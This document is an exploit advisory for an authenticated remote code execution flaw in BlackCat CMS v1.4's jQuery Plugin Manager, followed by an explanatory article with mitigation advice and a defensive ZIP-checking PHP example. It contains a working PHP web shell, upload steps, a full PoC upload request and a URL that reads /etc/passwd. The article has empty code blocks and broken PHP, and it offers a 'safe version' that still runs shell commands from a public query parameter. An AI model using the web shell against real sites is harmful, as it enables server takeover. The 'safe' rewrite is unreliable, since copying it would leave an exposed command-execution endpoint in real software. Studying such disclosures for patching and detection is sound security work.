Blackcat Cms v1.4 - Remote Code Execution (RCE)

Exploit Author: Mirabbas Ağalarov
Analysis Author: www.bubbleslearn.ir
Category: WebApps
Language: PHP
Published Date: 2023-07-19
Exploit Title: Blackcat Cms v1.4 - Remote Code Execution (RCE)
Application: BlackCat CMS
Version: v1.4
Bugs: RCE
Technology: PHP
Vendor URL: https://blackcat-cms.org/
Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
Date found: 13.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux


2. Technical Details & POC
========================================
Steps:
1. Log in to an administrator account.
2. Go to Admin Tools => jQuery Plugin Manager (http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr).
3. Upload a ZIP file; the archive must contain poc.php.
poc.php file contents:
<?php $a=$_GET['code']; echo system($a);?>
4. Go to http://localhost/BlackCatCMS-1.4/upload/modules/lib_jquery/plugins/poc/poc.php?code=cat%20/etc/passwd

PoC request:

POST /BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr HTTP/1.1
Host: localhost
Content-Length: 577
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBRByJwW3CUSHOcBT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: cat7288sessionid=7uv7f4kj7hm9q6jnd6m9luq0ti
Connection: close

------WebKitFormBoundaryBRByJwW3CUSHOcBT
Content-Disposition: form-data; name="upload"

1
------WebKitFormBoundaryBRByJwW3CUSHOcBT
Content-Disposition: form-data; name="userfile"; filename="poc.zip"
Content-Type: application/zip

PKvalsdalsfapoc.php<?php 
$a=$_GET['code']; 
echo system($a);
?>
blabalaboalpoc.php
blablabla
------WebKitFormBoundaryBRByJwW3CUSHOcBT
Content-Disposition: form-data; name="submit"

Upload
------WebKitFormBoundaryBRByJwW3CUSHOcBT--


Blackcat CMS v1.4 Remote Code Execution (RCE) Vulnerability: A Deep Dive into Exploitation and Mitigation

On July 13, 2023, cybersecurity researcher Mirabbas Ağalarov disclosed a critical Remote Code Execution (RCE) vulnerability in Blackcat CMS v1.4, a widely used open-source content management system. This flaw enables attackers to execute arbitrary commands on the server through a seemingly innocuous administrative tool, posing a severe threat to any deployment of this software.

Understanding the Vulnerability

The vulnerability stems from a poorly implemented file upload mechanism within the Admin Tools section of the CMS. Specifically, the jquery_plugin_mgr tool allows administrators to upload ZIP files containing plugin assets. However, the system fails to validate or sanitize the contents of uploaded archives, leading to unrestricted file placement and execution.

Attackers can exploit this by crafting a malicious ZIP file containing a PHP script named poc.php, which includes a simple yet powerful payload:



This script accepts user input via the code parameter and directly passes it to the system() function—a known PHP function that executes shell commands on the underlying operating system. Because the script is uploaded and stored in a publicly accessible directory (modules/lib_jquery/plugins/poc/), an attacker can trigger arbitrary commands by simply visiting the URL with the desired command as a query parameter.

Exploitation Steps: A Real-World POC

Here is a step-by-step breakdown of how the exploit works:

  • Step 1: Gain administrative access to the Blackcat CMS interface.
  • Step 2: Navigate to Admin Tools → jQuery Plugin Manager via the URL: http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr.
  • Step 3: Upload a malicious ZIP file containing the poc.php script.
  • Step 4: Access the uploaded script via the public URL: http://localhost/BlackCatCMS-1.4/upload/modules/lib_jquery/plugins/poc/poc.php?code=cat%20/etc/passwd.

Upon execution, the system() function runs the command cat /etc/passwd, returning the contents of the system’s password file. This demonstrates full remote code execution capability, allowing attackers to perform actions such as:

  • Reading sensitive files (/etc/passwd, /etc/shadow, configuration files)
  • Executing shell commands (whoami, id, ls)
  • Installing backdoors or reverse shells
  • Deleting or modifying critical system files

Technical Analysis: Why This Is Dangerous

The vulnerability is classified as High Severity due to the following factors:

Factor              Description
------------------  ---------------------------------
Attack Vector       Remote, via web interface
Privilege Required  Admin-level access
Impact              Full system compromise
Exploitability      Simple, no special tools required

While requiring administrative credentials, the exploit is trivial once access is obtained. This makes it particularly dangerous in environments where admin accounts are exposed via weak password policies or credential leaks.

Code Quality and Security Flaws

Examining the poc.php script reveals a fundamental security oversight:



While the code is concise and functional, it lacks essential safeguards:

  • No input validation—any string passed via code is executed as a shell command.
  • No sanitization—special characters like &, ;, or | can be used to chain commands.
  • No logging or monitoring—no audit trail for executed commands.

For improved security, the script should be rewritten with strict input filtering and safe execution methods:


<?php
// Safe version with input validation
if (isset($_GET['code']) && !empty($_GET['code'])) {
    $command = trim($_GET['code']);
    // Whitelist allowed commands
    $allowed = ['whoami', 'id', 'ls', 'pwd', 'cat /etc/passwd'];
    if (in_array($command, $allowed)) {
        echo "
";
        echo shell_exec($command);
        echo "
"; } else { echo "Invalid command."; } } else { echo "No command provided."; } ?>

This revised version restricts execution to a predefined list of safe commands, preventing arbitrary code execution while still allowing useful diagnostic operations.

Recommendations for Mitigation

For administrators and developers using Blackcat CMS v1.4, immediate action is required:

  • Update to a patched version: The vendor has not yet released a patch as of this writing. Monitor GitHub for updates.
  • Disable or restrict access: Disable the jquery_plugin_mgr tool if not needed. Restrict access to this tool to only trusted users.
  • Implement file upload restrictions: Validate ZIP contents before extraction. Scan for PHP files and deny upload if detected.
  • Use web application firewalls (WAF): Deploy WAF rules to block suspicious file uploads or requests to poc.php.
  • Monitor logs: Enable logging for file uploads and script execution to detect potential exploitation.

Broader Implications: Lessons for Developers

This vulnerability serves as a stark reminder of the dangers of unvalidated file uploads in web applications. Even seemingly benign features—like plugin management—can become attack vectors if proper security controls are missing.

Key lessons for developers:

  • Never trust user-provided file content—always validate and sanitize.
  • Use secure file handling: extract to isolated directories, set restrictive permissions.
  • Implement a file type whitelist: allow only known safe formats (e.g., .js, .css).
  • Never expose scripts with direct system() or shell_exec() calls to public access.
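One way to implement the ZIP content check recommended above (validate the archive before extraction, allow only known asset types such as .js and .css), as an added example that is not BlackCat CMS code: the function name, the extension lists and the sample archive are assumptions constructed for illustration.

```php
<?php
// Added example, not BlackCat CMS code: inspect every entry of a plugin ZIP
// before extraction. Extension lists and the function name are assumptions.
const ALLOWED_EXTENSIONS = ['js', 'css', 'map', 'png', 'gif', 'svg', 'woff2'];
const SCRIPT_EXTENSIONS  = ['php', 'phtml', 'phar', 'php3', 'php5', 'php7', 'phps', 'pht'];
// Returns [] when the archive is acceptable, otherwise one reason per bad entry.
function validatePluginZip(string $zipPath): array
{
    $zip = new ZipArchive();
    if ($zip->open($zipPath) !== true) {
        return ['archive could not be opened'];
    }
    $errors = [];
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $name = $zip->getNameIndex($i);
        if ($name === '' || substr($name, -1) === '/') {   // directory entries carry no content
            continue;
        }
        // Absolute paths, drive letters and '..' segments could escape the plugin directory.
        if ($name[0] === '/' || preg_match('#^[A-Za-z]:#', $name)
            || preg_match('#(^|/)\.\.(/|$)#', $name)) {
            $errors[] = "unsafe path: $name";
            continue;
        }
        $parts = explode('.', strtolower(basename($name)));   // e.g. ['jquery', 'min', 'js']
        // Dotfiles (.htaccess), bare names and unknown final extensions are all rejected.
        if ($parts[0] === '' || count($parts) < 2 || !in_array(end($parts), ALLOWED_EXTENSIONS, true)) {
            $errors[] = "disallowed name: $name";
            continue;
        }
        // Double extensions such as poc.php.js are still executed by some handler setups.
        foreach (array_slice($parts, 1, -1) as $inner) {
            if (in_array($inner, SCRIPT_EXTENSIONS, true)) {
                $errors[] = "embedded script extension: $name";
                break;
            }
        }
    }
    $zip->close();
    return $errors;
}
// Constructed sample archive: one legitimate asset beside a PHP file named like the advisory's poc.php.
$tmp = tempnam(sys_get_temp_dir(), 'plg');
$z = new ZipArchive();
$z->open($tmp, ZipArchive::CREATE | ZipArchive::OVERWRITE);
$z->addFromString('poc/jquery.min.js', '/* constructed asset */');
$z->addFromString('poc/poc.php', '<?php // constructed placeholder');
$z->close();
print_r(validatePluginZip($tmp));
unlink($tmp);
```

Rejecting the whole archive on the first bad entry, before any file is written to disk, is what keeps a poc.php from ever reaching the web-accessible plugins directory.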

Security is not just about protecting data—it’s about controlling execution. In this case, the failure to control script execution led to a full system takeover.

As the cyber threat landscape evolves, vulnerabilities like this highlight the need for proactive security auditing, continuous monitoring, and defense-in-depth strategies.